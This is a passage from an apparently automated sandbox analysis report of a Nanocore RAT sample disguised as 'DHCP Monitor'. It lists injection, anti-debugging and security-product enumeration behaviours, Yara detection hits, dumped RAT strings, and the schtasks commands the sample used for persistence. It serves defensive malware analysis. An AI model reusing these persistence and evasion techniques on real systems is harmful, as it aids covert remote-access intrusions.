        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 14_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_1_00401F30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_00401E1D SetUnhandledExceptionFilter,23_2_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_0040446F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_2_00401C88
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_2_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_2_00401F30
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_1_00401E1D SetUnhandledExceptionFilter,23_1_00401E1D
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_1_0040446F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_1_0040446F
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_1_00401C88 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,23_1_00401C88
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeCode function: 23_1_00401F30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,23_1_00401F30

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeMemory written: C:\Users\user\Desktop\RHK098760045678009000.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeMemory written: C:\Users\user\Desktop\RHK098760045678009000.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMemory written: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeMemory written: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Users\user\Desktop\RHK098760045678009000.exe 'C:\Users\user\Desktop\RHK098760045678009000.exe' Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpBEAC.tmp'Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpC322.tmp'Jump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeProcess created: C:\Users\user\Desktop\RHK098760045678009000.exe C:\Users\user\Desktop\RHK098760045678009000.exe 0Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0Jump to behavior
        Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' Jump to behavior
        Source: RHK098760045678009000.exe, 00000001.00000003.332764209.0000000005A4D000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: RHK098760045678009000.exe, 00000001.00000003.367011538.0000000005A2F000.00000004.00000001.sdmpBinary or memory string: Program Managerq
        Source: RHK098760045678009000.exe, 00000001.00000003.417962578.0000000005A2F000.00000004.00000001.sdmpBinary or memory string: WProgram Manager
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 1_1_0040208D cpuid 1_1_0040208D
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 11_2_00401B74 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,11_2_00401B74
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
        Source: C:\Users\user\Desktop\RHK098760045678009000.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24f0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.RHK098760045678009000.exe.f051458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24a0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.3a33258.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.38d3258.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.RHK098760045678009000.exe.f040000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24a0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RHK098760045678009000.exe.f041458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.3823258.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.38a16b4.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 23.2.dhcpmon.exe.4c4428.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.2490000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f050000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.dhcpmon.exe.f061458.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.722890.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.38d3258.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.39516b4.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f050000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000001.298075260.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313620230.0000000000715000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313348558.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.304923421.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.314060593.00000000024F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000001.289620419.0000000000414000.00000040.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000E.00000002.313999047.00000000024A0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327700810.0000000004960000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327748596.00000000049A2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306384984.00000000025F2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306683045.0000000003A31000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327148918.00000000004B5000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.305718280.0000000000615000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000017.00000002.327594984.0000000003821000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.306281947.0000000002490000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 1744, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 5820, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RHK098760045678009000.exe PID: 2184, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 2724, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6216, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6692, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 6812, type: MEMORYSTR

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: RHK098760045678009000.exe, 00000000.00000002.265580508.000000000F040000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RHK098760045678009000.exe, 00000008.00000002.292543029.000000000F030000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RHK098760045678009000.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: RHK098760045678009000.exe, 0000000B.00000002.306617686.0000000002A3E000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: dhcpmon.exe, 0000000C.00000002.300740057.000000000F050000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 0000000E.00000002.314320078.00000000038D1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Source: dhcpmon.exe, 00000015.00000002.314003400.000000000F050000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: dhcpmon.exe, 00000017.00000002.327568976.000000000282E000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24f0000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.RHK098760045678009000.exe.f051458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.1.RHK098760045678009000.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.24a0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.dhcpmon.exe.f061458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.RHK098760045678009000.exe.3a33258.6.raw.unpack, type: UNPACKEDPE
